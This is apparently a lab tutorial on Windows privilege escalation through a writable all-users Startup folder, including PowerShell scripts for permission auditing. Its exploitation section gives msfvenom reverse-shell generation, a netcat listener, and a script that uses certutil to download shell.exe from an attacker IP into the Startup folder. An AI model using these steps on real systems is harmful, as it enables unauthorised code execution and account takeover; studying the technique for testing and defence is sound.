Windows Privilege Escalation – Startup Applications

Introduction

Windows can launch specific applications automatically whenever a user logs on interactively: any executable or shortcut placed in a dedicated Startup folder is run by Explorer as part of that user's logon. The feature is convenient, but if the Startup folder that applies to all users has improper permissions it becomes a privilege escalation path, because whatever is placed there runs in the security context of whichever user logs on next, administrators included.

Identifying the Vulnerability

Startup applications that run for every user who logs on (including administrators) are stored in the all-users Startup folder:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

There is also a per-user folder under %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup, but a file placed there runs only as the owner of that profile, so it is the all-users folder that matters for privilege escalation.

The first step is to verify whether the current user has write access to that directory, so that a malicious executable can be placed in it. The built-in icacls or Sysinternals Accesschk can be used to display the permissions of a folder or file:

icacls [directory/file]
Accesschk.exe -accepteula -wuqv [directory/file]

With Accesschk, -w lists only principals that hold write access, -u suppresses errors, -q omits the banner and -v prints the individual rights; add -d when the argument is a directory so that it reports the permissions of the directory itself instead of enumerating its contents.

In the lab, the output of these commands showed that Everyone had write access to the path, which is what makes it exploitable. By default only SYSTEM and Administrators can write to this folder, so in icacls output any (W), (M) or (F) entry for Everyone, BUILTIN\Users or Authenticated Users is a misconfiguration; Accesschk prints such entries with an RW prefix. It is also worth checking the groups the current user belongs to (whoami /groups), since write access granted to one of those groups is just as usable.

Automated enumeration scripts such as WinPEAS also flag writable Autorun locations, the Startup folders included. The Sysinternals Autorunsc console tool lists the same logon entries (its logon category covers the Startup folders) and can emit CSV with -c, which makes the output easy to search for entries that do not belong.
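The checks described above, written as a PowerShell script rather than read off screenshots. This is an added example, not code from the original post: it inspects both Startup folders for Allow ACEs that give low-privileged principals any write right, confirms the result with a real write probe, and lists what already runs at logon. The list of "weak" principals is an assumption; add any group the current user belongs to.

```powershell
# Added example, not code from the original post: inspect both Startup folders
# for ACL entries that let low-privileged principals drop or replace files, then
# confirm with a real write probe. $WeakPrincipals is an assumption; add any
# group the current user belongs to (see: whoami /groups).

$StartupDirs = @(
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"   # all users: the privesc target
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"       # current user only: runs only as you
)

# Principals that should never hold write rights on the all-users folder.
$WeakPrincipals = @(
    'Everyone'
    'BUILTIN\Users'
    'NT AUTHORITY\Authenticated Users'
    'NT AUTHORITY\INTERACTIVE'
    "$env:USERDOMAIN\$env:USERNAME"
)

# Any of these rights is enough to plant an executable (CreateFiles is the same bit as WriteData).
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]'CreateFiles, AppendData, Write, Modify, FullControl'

function Get-WeakStartupAce {
    # One object per Allow ACE that grants a weak principal some write right.
    foreach ($dir in $StartupDirs) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        foreach ($ace in (Get-Acl -LiteralPath $dir).Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($WeakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            # [int] cast: generic rights such as GENERIC_ALL appear as raw bits, not enum names
            if (([int]$ace.FileSystemRights -band $WriteMask) -eq 0) { continue }
            [pscustomobject]@{
                Path      = $dir
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

function Test-StartupWrite {
    # Definitive check independent of ACL parsing: create and delete a probe file.
    foreach ($dir in $StartupDirs) {
        $probe = Join-Path $dir ("probe-{0}.tmp" -f [guid]::NewGuid())
        $writable = $false
        try {
            [System.IO.File]::WriteAllText($probe, 'probe')
            Remove-Item -LiteralPath $probe -Force
            $writable = $true
        } catch { }
        [pscustomobject]@{ Path = $dir; Writable = $writable }
    }
}

function Get-StartupEntries {
    # What already runs at logon, hidden files included, and who owns each entry.
    foreach ($dir in $StartupDirs) {
        Get-ChildItem -LiteralPath $dir -Force -ErrorAction SilentlyContinue |
            Select-Object FullName, Length, LastWriteTime,
                @{ Name = 'Owner'; Expression = { (Get-Acl -LiteralPath $_.FullName).Owner } }
    }
}

'== Weak ACEs ==';        Get-WeakStartupAce | Format-Table -AutoSize
'== Write probe ==';      Test-StartupWrite  | Format-Table -AutoSize
'== Existing entries =='; Get-StartupEntries | Format-Table -AutoSize
```

The write probe is the result to trust: ACL parsing can miss a group membership or a generic-rights ACE, whereas successfully creating and deleting a file in the all-users folder settles the question. A hit on the per-user folder is expected and is not a finding.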

Exploiting the Vulnerability

All that is left now is to place a malicious executable that spawns a reverse shell in the startup directory; the next time an administrator logs on interactively, Explorer will run it in that administrator's context. Two caveats: every user who logs on runs the file, not only administrators, and with UAC enabled an administrator's startup programs run with the filtered, medium-integrity token, so the shell obtained is that admin's account but not yet elevated. Full privileges then require a UAC bypass, an elevated prompt, or an account that is not filtered (the built-in Administrator account by default, or any admin on a system with UAC disabled).

The first step is to generate the payload using MSFvenom with the following flags:

  • -p to specify the payload, in this case the Windows TCP reverse shell (windows/shell_reverse_tcp)
  • LHOST to specify the attacker's IP address that the shell connects back to
  • LPORT to specify the attacker's port that the shell connects back to
  • -f to specify the output format, in this case exe
  • -o to write the result to a file, here shell.exe

The shell.exe file is then transferred to the Windows victim using Python's built-in http.server module on the attacker side and the Windows Certutil utility (its -urlcache -split -f options download a URL to a local path) on the victim side, saving it directly into the Startup directory mentioned above.

The next step is to set up a Netcat listener on the attacker machine, which will catch the reverse shell when the victim host executes the payload, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

FreeRDP is then used from the attacker machine to simulate an administrator user logging on over RDP, as the following screenshot shows:

Once the "admin" administrator user logged on, the malicious executable ran and the listener received a reverse shell as that user. Inside the shell, whoami confirms the account and whoami /groups shows the Mandatory Label line: High Mandatory Level means the token is already elevated, while Medium Mandatory Level means UAC filtered it and a bypass is still needed for full privileges:
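The victim-side part of the procedure above, as an added example that is not code from the original post. It assumes a lab where the attacker is 10.10.14.5, serves shell.exe over HTTP with python3 -m http.server 80, listens with nc -lvnp 4444, and built shell.exe with msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe; all of those values are placeholders. It adds one step the post does not show: a harmless probe that records which account executed the folder and at what integrity level, which answers the UAC question before a real payload is committed.

```powershell
# Added example, not code from the original post. Assumed lab values: the
# attacker is 10.10.14.5, serves shell.exe with "python3 -m http.server 80" and
# listens with "nc -lvnp 4444"; shell.exe was built with
#   msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe
# Run on the victim as the low-privileged user that can write to the folder.

$Attacker   = '10.10.14.5'
$StartupDir = "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
$ProbeLog   = Join-Path $env:PUBLIC 'startup-probe.log'   # C:\Users\Public: every user can read it

function Install-StartupProbe {
    # Step 1: a harmless batch file that records which account ran it and at what
    # integrity level. It proves the folder really executes at logon and shows
    # whether an admin logon gives a High-integrity token or a UAC-filtered Medium
    # one, before a real payload is committed.
    $bat = @"
@echo off
echo ==== %DATE% %TIME% ==== >> "$ProbeLog"
whoami >> "$ProbeLog"
whoami /groups | findstr /i "Mandatory" >> "$ProbeLog"
"@
    $target = Join-Path $StartupDir 'probe.bat'
    Set-Content -LiteralPath $target -Value $bat -Encoding ASCII
    return $target
}

function Install-StartupPayload {
    # Step 2: stage the reverse shell with certutil, as the post does
    # (Invoke-WebRequest -OutFile is the fallback when certutil is blocked).
    $target = Join-Path $StartupDir 'shell.exe'
    certutil.exe -urlcache -split -f "http://$Attacker/shell.exe" $target | Out-Null
    if (-not (Test-Path -LiteralPath $target)) { throw "download failed: $target" }
    return Get-Item -LiteralPath $target
}

function Read-StartupProbe {
    # Step 3, after an administrator has logged on: who executed the folder, and
    # at what level? "High Mandatory Level" means the shell you caught is already
    # elevated; "Medium Mandatory Level" means UAC filtered the admin token.
    if (-not (Test-Path -LiteralPath $ProbeLog)) { Write-Warning 'probe has not run yet'; return }
    Get-Content -LiteralPath $ProbeLog
}

function Remove-StartupArtifacts {
    # Step 4: clean up once the finding is documented; the files are visible in Autoruns.
    foreach ($f in @((Join-Path $StartupDir 'probe.bat'), (Join-Path $StartupDir 'shell.exe'), $ProbeLog)) {
        Remove-Item -LiteralPath $f -Force -ErrorAction SilentlyContinue
    }
}

Install-StartupProbe
Install-StartupPayload
Get-ChildItem -LiteralPath $StartupDir -Force | Select-Object Name, Length, LastWriteTime
# Now log on as an administrator (e.g. over RDP), catch the shell on the listener, then:
# Read-StartupProbe
# Remove-StartupArtifacts
```

Both files run for every account that logs on, so expect connections from non-administrators as well and keep the listener up. The probe log is appended on each logon, so one block per user accumulates; the whoami line identifies whose token each Mandatory Label belongs to.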

Conclusion

Although Startup applications are a useful Windows feature, the Startup folders should be configured carefully: only SYSTEM and Administrators should be able to write to the all-users startup path, and any write, modify or full-control entry granted to Everyone, Users or Authenticated Users should be removed, as exploiting this misconfiguration can result in a full system compromise. On the defensive side, file creation in either Startup folder is a high-value event to alert on.